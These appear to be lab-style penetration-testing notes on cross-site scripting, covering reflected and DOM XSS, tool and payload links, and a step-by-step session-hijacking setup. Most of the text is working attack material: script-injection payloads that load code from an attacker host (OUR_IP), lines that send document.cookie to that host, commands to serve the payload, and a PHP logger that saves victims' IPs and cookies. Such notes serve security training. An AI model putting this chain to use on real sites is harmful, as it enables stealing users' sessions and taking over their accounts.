1.1 Cross Site Scripting

Caveats: if HttpOnly flag is set to True, we cannot steal Cookie.
More info: https://owasp.org/www-community/HttpOnly

Reflected XSS: Sends the input data to the backend.
http://test:45960/index.php?task=test

DOM XSS: Completely processed on the client-side through Javascript. http://test:33537/#task=test

<img src="" onerror=alert(document.cookie)>

<script>print()</script>

Tools

https://github.com/s0md3v/XSStrike
https://github.com/rajeshmajumdar/BruteXSS
https://github.com/epsylon/xsser

Payloads

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS Injection/README.md

https://github.com/payloadbox/xss-payload-list

Session Hijacking

Make user to click the link and steal the cookie.
Search for the right payload
Create index.php
Create script.js
Set up php server that host index.php
Update script.js
Set up the payload so that it will redirect to script.js. The script.js will load index.php.

Blind XSS detection - Usually by certain users only.
Contact Forms
Reviews
User Details
Support Tickets
HTTP User-Agent header

Test with those.

<script src="http://OUR_IP/script.js"></script>
<script src="http://OUR_IP/username"></script>

script.js


##Update

new Image().src='http://OUR_IP/index.php?c='+document.cookie;

document.location='http://OUR_IP/index.php?c='+document.cookie;

Load a Remote script.js


# Serve the script and plug in to the target
$ mkdir /tmp/tmpserver
$ cd /tmp/tmpserver
$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started

XSS Sample - find a remote script

<script src=http://OUR_IP></script>

'><script src=http://OUR_IP></script>

"><script src=http://OUR_IP></script>

javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>

<script>$.getScript("http://OUR_IP")</script>

Create index.php

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>